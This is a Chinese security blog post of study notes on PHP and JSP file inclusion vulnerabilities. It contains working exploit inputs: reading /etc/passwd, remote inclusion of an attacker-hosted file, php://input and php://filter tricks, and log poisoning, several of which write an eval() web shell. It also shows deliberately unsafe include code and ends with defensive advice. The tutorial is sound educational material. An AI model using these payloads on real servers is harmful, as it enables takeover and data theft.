

<!DOCTYPE html>
<html lang="zh-CN" data-default-color-scheme=&#34;auto&#34;>



<head>
  <meta charset="UTF-8">
 <meta name="referrer" content="no-referrer"/>
  <link rel="apple-touch-icon" sizes="76x76" href="/img/favicon.png">
  <link rel="icon" href="/img/favicon.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="开发人员在开发网站时，往往会重复调用某些文件（一些函数或显示特定页面），以PHP为例，就提供了include()、require()、include_once()、require_once()一系列函数，被包含的文件会以php格式解析。当我们上传了php木马文件后（不一定为php格式，因为一定会以php格式解析；不一定上传到目标服务器，根具情况看能否可远程包含），再让服务器文件包含的参数指向我们所">
  <meta name="author" content="Eggs">
  <meta name="keywords" content="Blog">
  
  <title>文件包含学习笔记 - 蛋窝窝</title>

  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/github-markdown-css@4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/highlight.js@10.6.0/styles/atelier-sulphurpool-light.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css" />
  



<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->

  
<link rel="stylesheet" href="/css/diy/diy.css">



  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"2693993651.github.io","root":"/","version":"1.8.10","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":"§ "},"progressbar":{"enable":true,"height_px":3,"color":"#29d","options":{"showSpinner":false,"trickleSpeed":100}},"copy_btn":true,"image_zoom":{"enable":true,"img_url_replace":["",""]},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"lazyload":{"enable":true,"loading_img":"/img/loading.gif","onlypost":false,"offset_factor":2},"web_analytics":{"enable":false,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null}}};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.4.0"></head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>蛋窝窝 •ᴗ•Hi~</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                首页
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                归档
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                分类
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                标签
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                关于
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" target="_self" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" target="_self">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner" id="banner" parallax=true
         style="background: url('/img/default0.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="文件包含学习笔记">
              
            </span>

            
              <div class="mt-3">
  
    <span class="post-meta mr-2">
      <i class="iconfont icon-author" aria-hidden="true"></i>
      Eggs
    </span>
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2022-03-29 21:05" pubdate>
        2022年3月29日 晚上
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      2.7k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      32
       分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid nopadding-x">
  <div class="row nomargin-x">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-x-md">
      <div class="container nopadding-x-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">文件包含学习笔记</h1>
            
            <div class="markdown-body">
              <p>开发人员在开发网站时，往往会重复调用某些文件（一些函数或显示特定页面），以PHP为例，就提供了<code>include()、require()、include_once()、require_once()</code>一系列函数，被包含的文件会<strong>以php格式解析</strong>。当我们上传了php木马文件后（不一定为php格式，因为一定会以php格式解析；不一定上传到目标服务器，根具情况看能否可远程包含），再让服务器文件包含的参数指向我们所上传的文件，结合蚁剑等工具就可以控制服务器。</p>
<span id="more"></span>

<hr>
<h2 id="php包含"><a href="#php包含" class="headerlink" title="php包含"></a>php包含</h2><p>php包含可以简单分为本地包含和远程包含，其中如果要使用远程包含功能，首先需要确定php是否已经开启远程包含功能选项<code>allow_url_include = On、allow_url_fopen =  On</code></p>
<h3 id="函数介绍"><a href="#函数介绍" class="headerlink" title="函数介绍"></a>函数介绍</h3><ul>
<li>require 找不到被包含的文件时会产生致命错误，并停止脚本</li>
<li>require_once 与require类似，唯一区别是如果该文件中的代码也被包含，则不会再次包含</li>
<li>include 找不到文件时只会产生警告，脚本继续运行</li>
<li>include_once 与include类似，唯一区别是如果该文件中的代码也被包含，则不会再次包含</li>
</ul>
<hr>
<h3 id="代码示例"><a href="#代码示例" class="headerlink" title="代码示例"></a>代码示例</h3><p>在index.php中有如下代码</p>
<figure class="highlight php"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br>	<span class="hljs-keyword">if</span>(<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;page&#x27;</span>]))<br>    &#123;<br>        <span class="hljs-keyword">include</span> <span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;page&#x27;</span>];<br>    &#125;<br>	<span class="hljs-keyword">else</span><br>    &#123;<br>        <span class="hljs-keyword">include</span> <span class="hljs-string">&#x27;home.php&#x27;</span>;<br>    &#125;<br>    <br><span class="hljs-meta">?&gt;</span><br></code></pre></div></td></tr></table></figure>

<p>php前台代码如下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs php+HTML">&lt;a href=&quot;Index.php?page=main.php&quot;&gt;主页&lt;/a&gt;<br>&lt;a href=&quot;Index.php?page=news.php&quot;&gt;新闻&lt;/a&gt;<br>&lt;a href=&quot;Index.php?page=down.php&quot;&gt;下载&lt;/a&gt;<br></code></pre></div></td></tr></table></figure>

<p>当用户正常访问时，HTTP请求的url为：</p>
<p><code>http://www.xxx.com/Index.php?page=main.php</code></p>
<p><code>http://www.xxx.com/Index.php?page=news.php</code></p>
<p><code>http://www.xxx.com/Index.php?page=down.php</code></p>
<p>程序逻辑为：</p>
<p>1.提交url,在index.php中取得page参数的值</p>
<p>2.判断$_GET[‘page’]是否为空，若不为空，就是要include包含这个文件</p>
<p>3.若$_GET[‘page’]为空，则包含home.php文件</p>
<p>但是攻击者可能输入以下url:</p>
<p><code>http://www.xxx.com/Index.php?page=xxx.php</code></p>
<p>访问中国url将会包含xxx.php，但是通常情况下该文件在服务器端并不存在，所以在包含时会可能出现以下的警告，暴露出网站的绝对路径：</p>
<p><img src="https://gitee.com/manyeggs/drawing-bed-picgo/raw/master/images/20220329214513.png" srcset="/img/loading.gif" lazyload></p>
<hr>
<h3 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h3><h4 id="读取敏感文件"><a href="#读取敏感文件" class="headerlink" title="读取敏感文件"></a>读取敏感文件</h4><p>访问url:<code>http://www.xxx.com/index.php?page=/etc/passwd</code>，如果目标主机存在该文件并且有相应的权限，那么就可以读出文件的内容。反之，就有可能得到一个类似于<code>open_basedirrestriction in effect.</code>的警告</p>
<p><img src="https://gitee.com/manyeggs/drawing-bed-picgo/raw/master/images/20220329215654.png" srcset="/img/loading.gif" lazyload></p>
<h4 id="上传木马拿取shell"><a href="#上传木马拿取shell" class="headerlink" title="上传木马拿取shell"></a>上传木马拿取shell</h4><ul>
<li><p>当目标主机允许远程文件包含时</p>
<p>在攻击者服务器（或肉鸡）上布置木马文件。写入木马代码</p>
<figure class="highlight php"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs php"><span class="hljs-meta">&lt;?</span>fputs(fopen(<span class="hljs-string">&quot;shell.php&quot;</span>,<span class="hljs-string">&quot;w&quot;</span>),<span class="hljs-string">&quot;&lt;?php eval(<span class="hljs-subst">$_POST</span>[&#x27;Eggs&#x27;]);?&gt;&quot;</span>)<span class="hljs-meta">?&gt;</span><br>    <br><span class="hljs-comment">//$_POST[&#x27;Eggs&#x27;]中单引号可以省略</span><br></code></pre></div></td></tr></table></figure>

<p>到文件<code>http://www.Eggs.com/hack.txt</code>处。</p>
<p><strong>注意不能是PHP文件，如果是PHP文件的话，目标服务器进行包含的文件是已经过我们服务器解析过的文件了，所以把木马设为txt文件</strong></p>
<p>然后访问<code>http://www.xxx.com/Index.php?page=http://www.Eggs.com/hack.txt</code>，</p>
<p>将会在Index.php所在的目录下生成shell.php文件，内容为：</p>
<p><code>&lt;?php eval ($_POST[&#39;Eggs&#39;])&gt;</code></p>
<p><img src="https://gitee.com/manyeggs/drawing-bed-picgo/raw/master/images/file_include002.jpg" srcset="/img/loading.gif" lazyload></p>
</li>
</ul>
<ul>
<li><p>本地包含配合文件上传</p>
<p>在网站提供上传文件的地点（头像、文档等），将木马语句写入上传的文件中上传。复制文件上传后的路径，访问<code>目标站点/index.php?page=文件上传后的路径</code>即可。</p>
<p>在我之前upload labs的帖子中有详细过程 [我是传送门](<a target="_blank" rel="noopener" href="https://eggswoo.com/2021/10/27/upload">https://eggswoo.com/2021/10/27/upload</a> labs闯关历程/#14–图片马之文件头检查)</p>
</li>
</ul>
<p>这是简单粗暴的利用方式，当条件不满足时，还可以利用以下的方式迂回。</p>
<h4 id="使用PHP封装协议"><a href="#使用PHP封装协议" class="headerlink" title="使用PHP封装协议"></a>使用PHP封装协议</h4><p>php带有很多内置url风格的封装协议，这类协议于fopen()、copy()、file_exists()、filesize()等文件函数系统函数所提供的功能类似。</p>
<p><img src="https://gitee.com/manyeggs/drawing-bed-picgo/raw/master/images/20220329225307.png" srcset="/img/loading.gif" lazyload></p>
<ul>
<li><p>使用封装协议读取PHP文件</p>
<p>使用PHP内置封装协议可以读取PHP文件，例子如下：</p>
<p><code>http://www.xxx.com/index.php?page=php://filter/read=convert.base64-encode/resource=config.php</code></p>
<p>访问该url即可得到base64加密后的配置文件（不会编译PHP文件），再解密即可得到原文件。</p>
</li>
<li><p>写入PHP文件</p>
<p>使用<code>php://input</code>可以执行PHP语句，但使用这条语句也需要配置文件这项设置<code>allow_url_include = On </code>。访问url<code>http://www.xxx.com/index.php?page=php://input</code>，并提交参数<code>&lt;?PHP fputs(fopen(&#39;shell.php&#39;,&#39;w&#39;),&#39;&lt;?php @eval($_POST[&quot;eggs&quot;])?&gt;&#39;);?&gt;</code></p>
<p>即可在index.php所在目录下生成shell.php。</p>
</li>
</ul>
<p>关于PHP伪协议利用的详细部分可见我这一篇博客：</p>
<h4 id="包含Apache日志文件"><a href="#包含Apache日志文件" class="headerlink" title="包含Apache日志文件"></a>包含Apache日志文件</h4><p>当存在本地包含漏洞却无法上传文件时，前面提到的利用手段也失效了。但针对apache服务器本地包含还有另外一种利用方式，就是找到apache路径，利用包含漏洞包含apache日志文件也可以获取webshell。</p>
<p>apache运行后一般默认生成两个日志文件，这两个文件是access.log（访问日志）和error.log（错误日志），apache的访问日志文件记录了客户端的每次请求以及服务器响应的相关信息，例如，当我们请求Index.php页面时，apache就会记录下我们的操作，并且写到访问日志文件access.log中。</p>
<p><em>如果access.log文件没有开启，可能是因为配置文件中没有开启设置，需要手动更改设置</em></p>
<p><img src="https://gitee.com/manyeggs/drawing-bed-picgo/raw/master/images/20220330092619.png" srcset="/img/loading.gif" lazyload></p>
<p><strong>不过我实验的时候，我用的apache日志文件以及改成了access.log.+一串数字，目录下的access.log文件是空的，猜测apache已经修改了日志文件的命名方式来修复该漏洞</strong></p>
<p><img src="https://gitee.com/manyeggs/drawing-bed-picgo/raw/master/images/20220330090522.png" srcset="/img/loading.gif" lazyload></p>
<p>而我下载的另一个版本的apache并没有对此进行修改</p>
<p><img src="https://gitee.com/manyeggs/drawing-bed-picgo/raw/master/images/20220330091633.png" srcset="/img/loading.gif" lazyload></p>
<p>遗憾的是我目前并没有在网上查询到相关资料，哪些版本的apache日志文件仅为access.log。</p>
<p><strong>在这里为了复现漏洞，我把<code>access.log.1648598400</code>看作<code>access.log</code>文件</strong>，实际情况中攻击者会因为无法得知日志文件名称来触发文件包含漏洞。</p>
<p>access.log文件内容如下</p>
<p><img src="https://gitee.com/manyeggs/drawing-bed-picgo/raw/master/images/20220329233321.png" srcset="/img/loading.gif" lazyload></p>
<p>可以看出，每一行记录一次网站访问记录，由7部分组成，格式如下：</p>
<ul>
<li>客户端地址：访问网站的客户端IP地址</li>
<li>访问者标识：该项一般为空白，用“-”代替</li>
<li>访问者的验证名字“该项用于记录访问者验证身份时提供的名字，一般也为空白</li>
<li>请求的时间：记录访问操作的发生时间</li>
<li>请求类型：记录服务器收到的都是什么类型的请求，如GET、POST、HEAD等</li>
<li>响应的HTTP状态码：通过该项可以知道请求是否成功</li>
<li>发送给客户端的字节数：表示发送给客户端的总字节数</li>
</ul>
<p>当访问一个不存在的资源时，apache日志同样会记录。这就意味着，如果网站存在本地包含漏洞，却没有可以包含的文件时（通常是指网页木马文件），就可以访问url：<code>http://www.xxx.com/&lt;?php phpinfo();?&gt;</code>，apache会记录请求<code>&lt;?php phpinfo();?&gt;</code>，并写到access.log文件中，这时再去包含apache的日志文件，即可利用包含漏洞了。</p>
<p>不过这个操作还需要解决两个问题。一个是apache日志文件的路径，如果用户修改了默认路径则攻击者就难以利用漏洞了。另一个问题是参数在浏览器中的url传递时，其中的特殊符号如<code>&lt; &gt; \</code>会进行url加密，这就导致了apache日志文件储存的php代码失效了。不过我们可以通过burp suite代理发包绕过浏览器的编码。</p>
<p><img src="https://gitee.com/manyeggs/drawing-bed-picgo/raw/master/images/20220330085622.png" srcset="/img/loading.gif" lazyload></p>
<p>因为包含了特殊符号，服务器状态码为400，但依旧成功写入log文件中。</p>
<p><img src="https://gitee.com/manyeggs/drawing-bed-picgo/raw/master/images/20220330085737.png" srcset="/img/loading.gif" lazyload></p>
<p>成功触发php代码。</p>
<h4 id="截断包含"><a href="#截断包含" class="headerlink" title="截断包含"></a>截断包含</h4><p>有些防护人员为了修复php的包含漏洞，会固定扩展名，代码如下</p>
<figure class="highlight php"><table><tr><td class="gutter hljs"><div class="hljs code-wrapper"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></div></td><td class="code"><div class="hljs code-wrapper"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br>	<span class="hljs-keyword">if</span>(<span class="hljs-keyword">isset</span>(<span class="hljs-variable">$_GET</span>[<span class="hljs-string">&#x27;page&#x27;</span>]))<br>    &#123;<br>        <span class="hljs-keyword">include</span> <span class="hljs-variable">$GET</span>[<span class="hljs-string">&#x27;page&#x27;</span>].<span class="hljs-string">&quot;.php&quot;</span>;<br>    &#125;<br>	<span class="hljs-keyword">else</span><br>    &#123;<br>        <span class="hljs-keyword">include</span> <span class="hljs-string">&#x27;home.php&#x27;</span>;<br>    &#125;<br><span class="hljs-meta">?&gt;</span><br></code></pre></div></td></tr></table></figure>

<p>当进行包含时，不需要传输文件扩展名。例如，想要包含News.php页面，只需要传入<code>http://www.xxx.com/Index.php?page=News</code>即可。</p>
<p>假设上传一句话木马文件的路径为<code>/uoloadfile/a.jpg</code>，当包含这样的图片时，url为<code>http://www.xxx.com/Index.php?page=./uoloadfile/a.jpg</code>，而php程序包含时会包含<code>uoloadfile/a.jpg.php</code>，没能指向我们的木马导致漏洞</p>
<p>而攻击者可以访问以下url：</p>
<p><code>http://www.xxx.com/Index.php?page=./uoloadfile/a.jpg%00</code>来触发漏洞。这种方式只适用于magic_quotes_gpc= OFF时，如果为On，%00（NULL）将会被转义，从而无法正常截断。当magic_quotes_gpc为On时，以下预定义字符转义：单引号，双引号，反斜杠，NULL。</p>
<p>另外在php &lt; 5.2.8的情况下，可以使用长度截断，只需要不断的重复./即可，linux下4096字节时会达到最大值，在window下是256字节，在达到最大值后，后面的部分将会被省略。如shell.php/./././././省略/./././；注意不能超过容器支持的最大长度，不然会提示GET请求太长</p>
<hr>
<h2 id="JSP包含"><a href="#JSP包含" class="headerlink" title="JSP包含"></a>JSP包含</h2><p>JSP包含分两种方式：静态包含和动态包含，下面将详细介绍这两种包含操作。</p>
<h3 id="静态包含"><a href="#静态包含" class="headerlink" title="静态包含"></a>静态包含</h3><p><code>&lt;$@ include file=&quot;page.txt&quot;&gt;</code>为JSP中的静态包含语句，静态包含会先包含，再进行操作。而JSP语法规定这种包含只能包含一个已经存在于服务器中的文件，file的参数不能动态赋值，所以静态包含是不存在漏洞 的。</p>
<h3 id="动态包含"><a href="#动态包含" class="headerlink" title="动态包含"></a>动态包含</h3><p><code>&lt;jsp:include page=&quot;pagse.txt&quot;/&gt;</code>为动态包含语句，动态包含会先处理被包含页面，然后再包含。不过jsp中被包含的文件只会被当作文本，攻击者最多只能读取一些重要的文件。</p>
<p><em>根据语言特性PHP文件包含的漏洞出现的可能和危害性更大，所以关于文件包含大多数讨论的都是关于PHP的</em></p>
<hr>
<h2 id="安全编写文件包含"><a href="#安全编写文件包含" class="headerlink" title="安全编写文件包含"></a>安全编写文件包含</h2><ul>
<li>严格判断包含中的参数是否外部可控，这是文件包含漏洞利用成功与否的关键点</li>
<li>限制被包含的文件只能在某一文件夹内，禁止目录跳转字符，如“../”</li>
<li>采用白名单限制被包含的文件</li>
<li>尽量不要使用动态文件包含，可以在需要包含的页面固定写好，如<code>include(&quot;head.php&quot;)</code></li>
</ul>
<hr>
<p>参考：《web安全深度刨析》</p>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                  <div class="post-meta mr-3">
                    <i class="iconfont icon-category"></i>
                    
                      <a class="hover-with-bg" href="/categories/%E5%AD%A6%E4%B9%A0/">学习</a>
                    
                      <a class="hover-with-bg" href="/categories/%E5%AD%A6%E4%B9%A0/%E7%BD%91%E5%AE%89/">网安</a>
                    
                  </div>
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/%E6%B8%97%E9%80%8F/">渗透</a>
                    
                      <a class="hover-with-bg" href="/tags/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB/">文件包含</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">
                  
                    本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！
                  
                </p>
              
              
                <div class="post-prevnext">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2022/03/30/%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%ABPHP%E4%BC%AA%E5%8D%8F%E8%AE%AE%E7%9A%84%E4%BD%BF%E7%94%A8/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">文件包含PHP伪协议的使用</span>
                        <span class="visible-mobile">上一篇</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2022/03/28/%E9%80%BB%E8%BE%91%E6%BC%8F%E6%B4%9E%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/">
                        <span class="hidden-mobile">逻辑漏洞学习笔记</span>
                        <span class="visible-mobile">下一篇</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
              <!-- Comments -->
              <article class="comments" id="comments" lazyload>
                
                  
                
                
  <div id="valine"></div>
  <script type="text/javascript">
    Fluid.utils.loadComments('#valine', function() {
      Fluid.utils.createScript('https://cdn.jsdelivr.net/npm/valine@1.4.14/dist/Valine.min.js', function () {
        new Valine({
          el: "#valine",
          app_id: "DejyuTUMjI2eFz3aDorItWV1-gzGzoHsz",
          app_key: "fuBqYYOE6Y2x4Ssxcxg7OhUW",
          placeholder: "说点什么",
          path: window.location.pathname,
          avatar: "monsterid",
          meta: ["nick"],
          pageSize: "10",
          lang: "zh-CN",
          highlight: true,
          recordIP: true,
          serverURLs: "",
        });
      });
    });
  </script>
  <noscript>Please enable JavaScript to view the comments</noscript>


              </article>
            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;目录</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">搜索</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">关键词</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
  </div>
  
  <div class="statistics">
    
    

    
      
        <!-- 不蒜子统计PV -->
        <span id="busuanzi_container_site_pv" style="display: none">
            总访问量 
            <span id="busuanzi_value_site_pv"></span>
             次
          </span>
      
      
        <!-- 不蒜子统计UV -->
        <span id="busuanzi_container_site_uv" style="display: none">
            总访客数 
            <span id="busuanzi_value_site_uv"></span>
             人
          </span>
      
    
  </div>


  

  
<div>
  <span id="timeDate">载入天数...</span>
  <span id="times">载入时分秒...</span>
  <script>
  var now = new Date();
  function createtime(){
      var grt= new Date("05/14/2021 10:42:10");//此处修改你的建站时间或者网站上线时间
      now.setTime(now.getTime()+250);
      days = (now - grt ) / 1000 / 60 / 60 / 24;
      dnum = Math.floor(days);
      hours = (now - grt ) / 1000 / 60 / 60 - (24 * dnum);
      hnum = Math.floor(hours);
      if(String(hnum).length ==1 ){
          hnum = "0" + hnum;
      }
      minutes = (now - grt ) / 1000 /60 - (24 * 60 * dnum) - (60 * hnum);
      mnum = Math.floor(minutes);
      if(String(mnum).length ==1 ){
                mnum = "0" + mnum;
      }
      seconds = (now - grt ) / 1000 - (24 * 60 * 60 * dnum) - (60 * 60 * hnum) - (60 * mnum);
      snum = Math.round(seconds);
      if(String(snum).length ==1 ){
                snum = "0" + snum;
      }
      document.getElementById("timeDate").innerHTML = "🐣孵化中... for&nbsp"+dnum+"&nbspdays";  //此次自定义显示内容
      document.getElementById("times").innerHTML = hnum + "&nbsphr&nbsp" + mnum + "&nbspmin&nbsp" + snum + "&nbspsec";
  }  //此次自定义显示内容
  setInterval("createtime()",250);
  </script>
</div>
<div class="text-center py-1">   
  <div>
    <span>Copyright © 2021</span></a>
    <span>Eggswoo</span></a>    <br>
  </div>
</footer>


  <!-- SCRIPTS -->
  
  <script  src="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.jsdelivr.net/npm/nprogress@0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":100})
    NProgress.start()
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.jsdelivr.net/npm/jquery@3.6.0/dist/jquery.min.js" ></script>
<script  src="https://cdn.jsdelivr.net/npm/bootstrap@4.5.3/dist/js/bootstrap.min.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/img-lazyload.js" ></script>
  



  



  <script  src="https://cdn.jsdelivr.net/npm/tocbot@4.12.2/dist/tocbot.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js" ></script>



  <script  src="https://cdn.jsdelivr.net/npm/anchor-js@4.3.0/anchor.min.js" ></script>



  <script defer src="https://cdn.jsdelivr.net/npm/clipboard@2.0.8/dist/clipboard.min.js" ></script>



  <script defer src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" ></script>




  <script  src="https://cdn.jsdelivr.net/npm/typed.js@2.0.11/lib/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
      typing(title)
      
    })(window, document);
  </script>



  <script  src="/js/local-search.js" ></script>
  <script>
    (function () {
      var path = "/local-search.xml";
      $('#local-search-input').on('click', function() {
        searchFunc(path, 'local-search-input', 'local-search-result');
      });
      $('#modalSearch').on('shown.bs.modal', function() {
        $('#local-search-input').focus();
      });
    })()
  </script>














  
<script src="/js/diy/diy.js"></script>
<script src="//cdn.jsdelivr.net/gh/bynotes/texiao/source/js/caidai.js"></script>



<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>


</body>
</html>
